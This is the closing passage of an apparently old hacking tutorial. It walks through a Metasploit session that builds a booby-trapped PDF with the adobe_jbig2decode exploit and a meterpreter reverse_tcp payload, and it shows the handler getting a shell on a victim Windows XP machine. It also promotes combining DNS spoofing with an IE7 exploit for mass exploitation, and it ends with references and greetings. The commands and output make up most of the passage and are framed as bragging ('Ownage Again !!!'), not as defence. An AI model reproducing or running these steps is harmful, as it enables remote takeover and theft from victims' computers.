| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __|
| | | | | | __/ || (_| __ |_) | | (_) | | |_
|_| |_| |_|___|____,_|___/ .__/|_|___/|_|__|
| |
|_|
=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf > use windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set TARGET 0
TARGET => 0
msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
FILENAME => malfile.pdf
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
LHOST => 192.168.80.131
msf exploit(adobe_jbig2decode) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'malfile.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_jbig2decode) > exit
bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444
LHOST=192.168.80.131 E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stanger for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)
meterpreter > getuid
Server username: WINXPvictim
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Micorsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsvictimDesktop> Ownage Again !!!
[End Result]------------------------------------------------------------------------------------
Other techniques such as "DNS Spoofing+IE7" was great for Mass Exploit, you can see video at http://www.milw0rm.com/
That use Ettercap for DNS spoofing then use Metasploit for handling reverse shell from "IE7 MS09-002 Memory Corruption Vulne
drive to attacker's machine and ... Game Over !!
#####################
[0x05] - References
#####################
[1] SANS: Scanning Windows Deepers With Nmap Scanning Engines
[2] http://nmap.org
[3] http://oss.coresecurity.com/projects/pshtoolkit.html
[4] http://blog.metasploit.com/
[5] http://foofus.net/jmk/passhash.html
[6] Full Scope Security Attacking Layer 8
[7] PaulDotCom Forum
[8] www.milw0rm.com
####################
[0x06] - Greetz To
####################
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
----------------------------------------------------
16 of 17 12/24/10 5:51 PM